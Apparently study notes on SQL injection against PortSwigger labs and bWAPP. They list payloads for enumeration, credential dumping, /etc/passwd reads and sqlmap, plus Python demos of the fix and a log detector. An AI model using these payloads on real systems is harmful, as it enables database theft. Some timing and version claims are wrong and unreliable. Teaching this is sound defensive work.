SQL Injection

    
  1. SQL injection:
    1. SQL injection arises when the application concatenates untrusted user input into a SQL query, so that the input reaches the database server and is executed as code.
    2. Three classes, based on how data is extracted:
      1. In-band
      2. Inferential or blind
      3. Out-of-band
    3. Five techniques to exploit SQL injection:
      1. Union operator (U)
      2. Boolean technique (B)
      3. Error-based technique (E)
      4. Out-of-band technique (O)
      5. Time delay technique (T)
    4. Exploits:
      1. SQL Injection (POST/Search)
        1. Break the query with a single quote (').
        2. Then use the #, -- or // sign to comment out the part of the query that follows the single quote.
        3. The "order by" clause can also be used to find the number of columns in the query.
          1. Try ' order by 1, then ' order by 2, and so on up to ' order by (number of columns); keep increasing the number until an error is received.
          2. If ' order by 1 through ' order by 10 give no error and ' order by 11 gives an error, the query has exactly 10 columns.
          3. ' order by 10 sorts the results by the 10th column, which only succeeds when at least 10 columns exist.
    5. PortSwigger examples of SQL injection:
      1. First example:
        1. Read the exercise in the screenshot below.
        2. Here the gift category has a SQL injection, exploited as described below.
        3. category=Gifts (category is the parameter and Gifts is the value)
        4. To exploit:
          1. Gifts' OR 1 = 1 --
          2. This prints all category results available in the application/database.

      2. Second example:
        1. Read the exercise in the screenshot below.
        2. In this example we have a login page with the username administrator.
        3. We need to bypass the login page by giving:
          1. administrator' OR 1 = 1 --

      3. Third example: explore PortSwigger further.
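The two PortSwigger payloads above work because the application builds its query by string concatenation, so the quote and the -- comment marker become part of the SQL text. The Python example below is added here and is not code from these notes or from PortSwigger's labs; it uses an in-memory SQLite database with a constructed product catalogue and user table (table names, rows and the plaintext password column are assumptions made for the demo). SQLite, like MySQL, treats -- as a line comment, which is what lets the payload cut the statement short. Each payload is run against the concatenated query and against the same query with bound parameters, which is the fix.

```python
import sqlite3

# Constructed sample data standing in for the lab's product catalogue and
# user table (not the lab's real schema).
PRODUCTS = [
    (1, "Gifts", 1, "Mug"),
    (2, "Gifts", 0, "Unreleased gift"),
    (3, "Pets", 1, "Leash"),
    (4, "Pets", 0, "Unreleased pet toy"),
]
# Plaintext passwords only to keep the demo short; never store them this way.
USERS = [("administrator", "s3cret"), ("wiener", "peter")]


def make_db():
    """Build an in-memory SQLite database holding the constructed tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, category TEXT, released INTEGER, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?, ?)", PRODUCTS)
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def filter_products_vulnerable(conn, category):
    # The category value is pasted into the SQL text, so a quote and a comment
    # marker inside it are parsed as SQL. This is the defect in the first example.
    sql = f"SELECT name FROM products WHERE category = '{category}' AND released = 1"
    return [row[0] for row in conn.execute(sql)]


def filter_products_safe(conn, category):
    # Parameter binding: the driver sends the value as data, never as SQL text.
    sql = "SELECT name FROM products WHERE category = ? AND released = 1"
    return [row[0] for row in conn.execute(sql, (category,))]


def login_vulnerable(conn, username, password):
    # Same defect on the login form of the second example: the comment marker
    # removes the password check and OR 1=1 matches every user.
    sql = f"SELECT username FROM users WHERE username = '{username}' AND password = '{password}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def demo():
    """Run both payloads from the notes against the vulnerable and the bound queries."""
    conn = make_db()
    category_payload = "Gifts' OR 1=1 --"
    login_payload = "administrator' OR 1=1 --"
    return {
        "category_normal": filter_products_vulnerable(conn, "Gifts"),
        "category_payload_vulnerable": filter_products_vulnerable(conn, category_payload),
        "category_payload_safe": filter_products_safe(conn, category_payload),
        "login_payload_vulnerable": login_vulnerable(conn, login_payload, "wrong-password"),
        "login_payload_safe": login_safe(conn, login_payload, "wrong-password"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

With the concatenated query the category payload returns all four products, unreleased ones included, and the login payload returns "administrator" without a valid password; with bound parameters the same strings are simply looked up as literal category and username values and match nothing.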
    6. bWAPP application:
      1. In-band SQL injection over a search form (SQL Injection - POST/Search)
        1. Scenario: you can search movie names; if a name is present in the database it is returned, otherwise nothing is.
        2. SQL Injection (POST/Search)
          1. Break the query with a single quote (').
          2. Then use the #, -- or // sign to comment out the part of the query that follows the single quote.
          3. The "order by" clause can also be used to find the number of columns in the query.
            1. Try ' order by 1 up to ' order by (number of columns); keep increasing the number until an error is received.
            2. If ' order by 1 through ' order by 10 give no error and ' order by 11 gives an error, the query has exactly 10 columns.
            3. ' order by 10 sorts the results by the 10th column.
            4. Now if you give ' union select 1,2,3,4,5,6,7# the page shows which of the column positions are reflected in the output.
            5. Then, in place of 2, 3 and 4, add version(), database() and user(), e.g.: ' union select 1,version(),database(),user(),5,6,7#
      2. In-band SQL injection over a select form (SQL Injection - Select From)
        1. Scenario: you can select a movie from the drop-down menu and click the "GO" button, which fetches the movie details from the server.
        2. SQL Injection (POST/Select Form)
          1. If we intercept the first request in the proxy, we see it is a POST request whose body carries parameters like:
            1. movie=1&action=go
          2. If we now try a single quote (') to break the query sent to the database, as in the previous scenario, the server throws an error, but adding further single quotes as in the previous scenario does not satisfy the syntax.
          3. The catch is that a SQL statement without quotes works, like this:
            1. G.I. Joe: Retaliation is the movie in the first record of the table:
              1. movie=1&action=go
            2. So if we enter:
              1. movie=1 or 1=1&action=go
              2. The statement above satisfies the syntax and brings "G.I. Joe: Retaliation" from the server.
              3. If we do:
                1. movie=3 or 1=1&action=go
                2. The statement above also brings only the first record, "G.I. Joe: Retaliation", not the third movie.
                3. This shows we can retrieve information from the database.
            3. Now find the number of columns available:
              1. 7 columns are available in total, like this:
                1. movie=1 order by 7&action=go
                2. Where 1 = the movie record
                3. order by 7 = the correct number of columns; order by 8 gives an error.
            4. Now we will try to print all columns:
              1. movie=0 union select 1,2,3,4,5,6,7&action=go
              2. Where 0 = no records; null can be used in place of 0.
              3. Columns 2, 3, 4 and 5 are reflected and can be used to retrieve information.
            5. Let's retrieve the version, database and user:
              1. movie=0 union select 1,version(),database(),user(),5,6,7#&action=go
              2. Where 0 = null record.
              3. # = nothing after # is executed.

            6. Let's retrieve the character set of the database:
              1. movie=0 union select 1,schema_name,default_character_set_name,default_collation_name,5,6,7 from information_schema.schemata limit 0,1#&action=go

            7. Retrieve the other databases one row at a time:
              1. movie=0 union select 1,schema_name,default_character_set_name,default_collation_name,5,6,7 from information_schema.schemata limit 1,1#&action=go
              2. movie=0 union select 1,schema_name,default_character_set_name,default_collation_name,5,6,7 from information_schema.schemata limit 2,1#&action=go
              3. movie=0 union select 1,schema_name,default_character_set_name,default_collation_name,5,6,7 from information_schema.schemata limit 3,1#&action=go
              4. Club all databases together: movie=0 union select 1,group_concat(schema_name),group_concat(default_character_set_name),group_concat(default_collation_name),5,6,7 from information_schema.schemata&action=go
            8. Retrieve tables:
              1. movie=0 union select 1,table_name,3,4,5,6,7 from information_schema.tables&action=go
              2. movie=0 union select 1,table_name,3,4,5,6,7 from information_schema.tables limit 1,1&action=go
              3. Club all table names together: movie=0 union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables&action=go
            9. Retrieve the table names in a particular database (bWAPP):
              1. movie=0 union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema='bWAPP'&action=go
            10. Retrieve the column names in a particular table (database = bWAPP, table = movies):
              1. movie=0 union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_schema='bWAPP' and table_name='movies'&action=go
            11. Now we know the database structure: database names, tables and columns. Find the values present in the tables:
              1. We know the table name and the database name:
                1. movie=0 union select * from bWAPP.movies&action=go
                2. The step above gives the first record in the table.
                3. movie=0 union select * from bWAPP.movies limit 5,1&action=go
                4. The step above gives another record (the 5th) because limit 5,1 is added.
                5. movie=0 union select group_concat(id),group_concat(title),group_concat(release_year),group_concat(genre),group_concat(main_character),group_concat(imdb),group_concat(tickets_stock) from bWAPP.movies&action=go
                6. The step above returns the values present in the whole table.
                7. This query includes all the columns available in the table.
                8. movie=0 union select * from movies into OUTFILE '/var/www/bWAPP/documents/results.txt'&action=go
                9. The statement above writes the output to a file at the given location.
                10. Ignore the warning.
                11. movie=0 union select 1,load_file('/var/www/bWAPP/documents/results.txt'),3,4,5,6,7&action=go
                12. The statement above loads the file and shows its contents.
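The column-count walk with order by, the movie=3 or 1=1 behaviour and the union select marker row from the two bWAPP scenarios above can be reproduced locally. The Python example below is added here and is not code from these notes or from bWAPP; it builds a constructed seven-column movies table in an in-memory SQLite database (the rows are made up, and SQLite has no information_schema, so the schema-enumeration payloads are not repeated). It shows the unquoted numeric parameter being concatenated into the query, the ORDER BY error that reveals the column count, the union marker row, and the fix of casting the parameter to an integer and binding it.

```python
import sqlite3

# Constructed rows modelled on bWAPP's seven-column movies table; the data is made up.
MOVIES = [
    (1, "G.I. Joe: Retaliation", 2013, "action", "Cobra Commander", "5.8", 100),
    (2, "Iron Man", 2008, "action", "Tony Stark", "7.9", 53),
    (3, "Man of Steel", 2013, "action", "Clark Kent", "7.3", 78),
]


def make_db():
    """Build an in-memory SQLite database with the constructed movies table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE movies (id INTEGER, title TEXT, release_year INTEGER, genre TEXT,"
        " main_character TEXT, imdb TEXT, tickets_stock INTEGER)"
    )
    conn.executemany("INSERT INTO movies VALUES (?, ?, ?, ?, ?, ?, ?)", MOVIES)
    return conn


def movie_lookup_vulnerable(conn, movie_param):
    # The 'movie' form field is dropped into the query unquoted, as in the
    # Select Form scenario: no quote is needed to change the statement, and
    # fetchone() is why "3 or 1=1" returns the first record rather than the third.
    sql = f"SELECT * FROM movies WHERE id = {movie_param}"
    return conn.execute(sql).fetchone()


def probe_column_count(conn, max_cols=20):
    # The ORDER BY walk from the notes: raise n until the database rejects it.
    # SQLite reports "ORDER BY term out of range" where MySQL reports an unknown
    # column; both surface as OperationalError in the driver.
    for n in range(1, max_cols + 1):
        try:
            movie_lookup_vulnerable(conn, f"1 order by {n}")
        except sqlite3.OperationalError:
            return n - 1
    return None


def movie_lookup_safe(conn, movie_param):
    # Defence: enforce the expected type before the value gets near SQL, then bind it.
    movie_id = int(movie_param)
    return conn.execute("SELECT * FROM movies WHERE id = ?", (movie_id,)).fetchone()


def safe_rejects(conn, movie_param):
    """True when the hardened lookup refuses the input instead of querying with it."""
    try:
        movie_lookup_safe(conn, movie_param)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    conn = make_db()
    print(movie_lookup_vulnerable(conn, "3 or 1=1"))  # first record, not the third
    print(probe_column_count(conn))  # 7
    print(movie_lookup_vulnerable(conn, "0 union select 1,2,3,4,5,6,7"))  # marker row
    print(movie_lookup_safe(conn, "3"), safe_rejects(conn, "3 or 1=1"))
```

The int() cast is the whole defence for a numeric identifier: "3 or 1=1" and "0 union select ..." are rejected before any SQL is built, and the bound ? placeholder covers the case where the value does parse as a number.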

      3. Error-based SQL injection over a login form
        1. Scenario 1: bypass the login form - SQL Injection (Login Form/Hero)
          1. Enter something into the login form; it will give "invalid credentials" or some other message.
          2. Put in a single quote (') or a double quote and try 3-4 patterns; if a MySQL error message appears, it means we successfully broke the SQL query running behind the login form.
          3. ' or 1 = 1 #     this SQL injection lets us log in.
          4. Enumerate users (when we give 7 in the limit it gives an error, which means only 6 users are present):
            1. ' or 1 = 1 limit 1,1#
            2. ' or 1 = 1 limit 2,1#
            3. ' or 1 = 1 limit 3,1#
            4. ' or 1 = 1 limit 4,1#
            5. ' or 1 = 1 limit 5,1#
            6. ' or 1 = 1 limit 6,1#

          5. Column numbers (when we enter 5 as the column number it gives an error, so there are only 4 columns):
            1. ' or 1 = 1 order by 1#
            2. ' or 1 = 1 order by 2#
            3. ' or 1 = 1 order by 3#
            4. ' or 1 = 1 order by 4#

          6. Enumerate the database name and username:
            1. ' union select 1,2,3,4#     this shows the columns where we can print values later.
            2. ' union select 1,database(),3,user(),4#

      4. SQL injection over an insert statement
        1. Scenario: SQL Injection - Stored (Blog), like a comment page.
        2. The insert query looks like:
          1. INSERT INTO blog (date, entry, owner) VALUES (now(),' ',' ')
        3. Put in a single quote to disturb the syntax; it will, however, just add the single quote into the database field.
        4. In step 2 above, in VALUES(now(),' ',' '), if we add VALUES(now(),'a','b')#
        5. a','b')#     this causes no problem and instead adds a and b into the database.
        6. a',(select 1))#     this gives the old value (b inserted into the database).
        7. ',(select concat_ws(0x3a,database(),version(),user())))#
        8. a',(select concat_ws(0x3a,schema_name,default_character_set_name,default_collation_name) from information_schema.schemata limit 0,1))#
        9. a',(select concat_ws(0x3a,schema_name,default_character_set_name,default_collation_name) from information_schema.schemata limit 1,1))#
        10. a',(select group_concat(schema_name) from information_schema.schemata))#
        11. Retrieve tables now:
          1. a',(select concat_ws(0x3a,table_schema,table_name) from information_schema.tables limit 0,1))#
          2. a',(select concat_ws(0x3a,table_schema,table_name) from information_schema.tables limit 1,1))#
          3. a',(select concat_ws(0x3a,table_schema,table_name) from information_schema.tables limit 2,1))#
          4. a',(select concat_ws(0x3a,table_schema,table_name) from information_schema.tables limit 3,1))#
          5. a',(select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'))#     to find the tables in the 'bWAPP' database.
          6. a',(select concat_ws(0x3a,table_name,column_name) from information_schema.columns limit 0,1))#     to find table and column names
          7. a',(select group_concat(column_name) from information_schema.columns where table_schema='bWAPP' and table_name='users'))#     to find the column names of the 'users' table in the 'bWAPP' database
          8. a',(select concat_ws(0x3A,id,login,password,email,secret,admin) from bWAPP.users limit 0,1))#
          9. a',(select load_file('/etc/passwd')))#


      5. Boolean-based blind SQL injection
        1. Scenario: SQL Injection - Blind - Boolean-Based
        2. Normally the database holds movie names (for example); if a movie is present in the DB it gives a result, otherwise a negative message.
        3. If we try a single quote or something else to disturb the syntax, some error comes.
        4. We will now try blindly and logically.
        5. Write any SQL injection query like ' or 1=1; it will break the query, but no SQL error message appears.
        6. So we do not know how our syntax is breaking.
        7. We will follow two scenarios: FIRST a positive statement and SECOND a negative statement.
        8. Try '#
        9. The statement above may not throw an error; it may instead give the negative message (that movie is not available in the database).
        10. Now try ' or 1=1#; this should load the positive message (movie is available in the database).
        11. Now try ' or 1=2#; this should load the negative message (movie is not available in the database).

        12. Try ' or 1=1 and length(database())=5#
        13. In step 12, =5 is the length of the current database name.
        14. ' or 1=1 and substring(database(),1,1)='a'#
        15. Step 14 tests the first letter of the database name: 'a' in the query is a comparison checking whether the first letter is a or not.
        16. Likewise we need to brute-force from a to z to find the correct database name.
        17. In this case we know the database name is 'bWAPP', so the queries will be like:
        18. ' or 1=1 and substring(database(),1,1)='b'#
        19. ' or 1=1 and substring(database(),2,1)='W'#
        20. ' or 1=1 and substring(database(),3,1)='A'#
        21. ' or 1=1 and substring(database(),4,1)='P'#
        22. ' or 1=1 and substring(database(),5,1)='P'#
        23. For steps 18 to 22 the front-end message will be the positive one.

        24. Otherwise the front-end message will be the negative one.
        25. There are multiple options available for the comparison, like:
          1. ' or 1=1 and ascii(substring(database(),1,1))>97#
          2. 97 is the ASCII value of a.

      6. Time-based blind SQL injection
        1. Scenario: SQL Injection - Blind - Time-Based
        2. There is an input field where we enter a movie name; if it is present, the result is sent to your email address.
        3. ' and " are not working.
        4. This is because error reporting might be disabled in the code.
        5. Try boolean payloads, but boolean payloads do not always work.
        6. So try:
          1. ' or 1=1 and sleep(0.2)#
          2. 0.2 is two seconds and the application waits for 2 seconds.
          3. ' or 1=1 and benchmark(10000000,rand())#
          4. ' or 1=1 and if(mid(version(),1,1)='5',sleep(0.5),0)#     if OS version 5 is in use, the page loads after 5 seconds (yes, the backend is running Ubuntu)

      7. SQLmap
        1. SQL Injection (GET/Search) - detecting and exploiting SQL injection with SQLmap
        2. The tool is present in Kali; sqlmap -h and sqlmap -hh list a lot of options.
        3. Usage:
          1. sqlmap -u "<<complete GET URL with values>>" -p title --cookie "<<value of the Cookie header present in the request for the same URL (add everything in the Cookie header)>>" --random-agent -H "<<all requests will be sent with this header>>" --dbms MySQL --os Linux -f -b --current-db --is-dba
          2. --random-agent, -H (add an HTTP header): controls what the request appears to be sent from.
          3. --dbms MySQL: the database management system
          4. --os: the operating system present
          5. -f: fingerprinting
          6. -b: banner grab
          7. --current-db, --is-dba: the current database, and whether the current DB user is a DBA (admin) or not
        4. Detecting and exploiting error-based SQL injection with SQLmap
          1. SQL Injection (Login Form/User)
          2. A login form with username and password fields.
          3. Enter any input and intercept the request.
          4. Save the request (copy it into a .txt file).
          5. Open a terminal:
            1. sqlmap -r <<path of the saved request file>> -p login -H <<who will send the request / special headers>>
            2. sqlmap -r <<path of the saved request file>> -p login -H <<who will send the request / special headers>> --technique E -f -b
        5. Detecting and exploiting boolean-based and time-based blind SQL injection with SQLmap
          1. SQL Injection - Blind - Boolean-Based
          2. A search box that returns the movie name if it is present in the database.
          3. Enter any input and intercept the request.
          4. Save the request (copy it into a .txt file).
          5. Open a terminal:
            1. sqlmap -r <<path of the saved request file>> -p title -H <<who will send the request / special headers>>
            2. sqlmap -r <<path of the saved request file>> -p title -H <<who will send the request / special headers>> --technique B --dbms MySQL --level 5 --risk 3
              1. Level 5 means a much larger number of payloads.
              2. Risk means also trying riskier payload types, such as OR-based ones.
          6. Time-based
            1. A search box that returns the movie name if it is present in the database.
            2. Enter any input and intercept the request.
            3. Save the request (copy it into a .txt file).
            4. Open a terminal:
              1. sqlmap -r <<path of the saved request file>> -p title -H <<who will send the request / special headers>>
              2. sqlmap -r <<path of the saved request file>> -p title -H <<who will send the request / special headers>> --technique T -b -f
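From the defending side, the payload families used throughout these notes (tautologies, union select, information_schema lookups, substring/ascii comparisons, sleep/benchmark, load_file and into outfile) and SQLmap's default User-Agent are all visible in web server access logs. The Python example below is added here and is not part of the notes or of SQLmap; the five log lines are constructed in Apache combined format with bWAPP-style URLs, and the pattern list is an assumption chosen to match the payloads on this page rather than a complete ruleset. It URL-decodes each request target once and reports which families matched. As the notes say, --random-agent replaces the sqlmap User-Agent, so the agent check only catches default runs.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines in Apache combined format, using bWAPP-style URLs.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /sqli_1.php?title=Iron+Man&action=search HTTP/1.1" 200 1200 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli_1.php?title=%27+or+1%3D1%23&action=search HTTP/1.1" 200 5600 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli_1.php?title=%27+union+select+1%2Cgroup_concat%28table_name%29%2C3%2C4%2C5%2C6%2C7+from+information_schema.tables%23&action=search HTTP/1.1" 200 7800 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli_15.php?title=%27+or+1%3D1+and+sleep%280.2%29%23&action=search HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /sqli_1.php?title=Man+of+Steel&action=search HTTP/1.1" 200 1100 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"',
]

# Payload families from these notes, matched against the URL-decoded, lower-cased request target.
PAYLOAD_PATTERNS = {
    "tautology": re.compile(r"'\s*or\s+\d+\s*=\s*\d+|\bor\s+1\s*=\s*1\b"),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),
    "schema_enum": re.compile(r"\binformation_schema\.(schemata|tables|columns)\b"),
    "boolean_blind": re.compile(r"\b(substring|mid|ascii|length)\s*\("),
    "time_blind": re.compile(r"\b(sleep|benchmark)\s*\("),
    "file_access": re.compile(r"\bload_file\s*\(|\binto\s+outfile\b"),
}

# Request line, status, size, referer and User-Agent of a combined-format log line.
LOG_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" \d+ \d+ "[^"]*" "(?P<ua>[^"]*)"'
)


def classify_line(line):
    """Return the list of payload families found in one access-log line."""
    m = LOG_RE.search(line)
    if not m:
        return []
    # One decode pass: the payloads in the notes are single-encoded by the browser or proxy.
    decoded = unquote_plus(m.group("target")).lower()
    labels = [name for name, rx in PAYLOAD_PATTERNS.items() if rx.search(decoded)]
    # SQLmap announces itself unless --random-agent (or -H) overrides the User-Agent.
    if "sqlmap" in m.group("ua").lower():
        labels.append("sqlmap_agent")
    return labels


def scan(lines):
    """Return (1-based line number, labels) for every line that matched at least one family."""
    hits = []
    for number, line in enumerate(lines, 1):
        labels = classify_line(line)
        if labels:
            hits.append((number, labels))
    return hits


if __name__ == "__main__":
    for number, labels in scan(LOG_LINES):
        print(f"line {number}: {', '.join(labels)}")
```

The POST/Search, Select Form and login scenarios send their payloads in the request body, which the access log does not record, so the same patterns have to run on application-level request logging or a WAF to cover them; matching on decoded text also means a double-encoded payload needs a second decode pass before it is caught.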

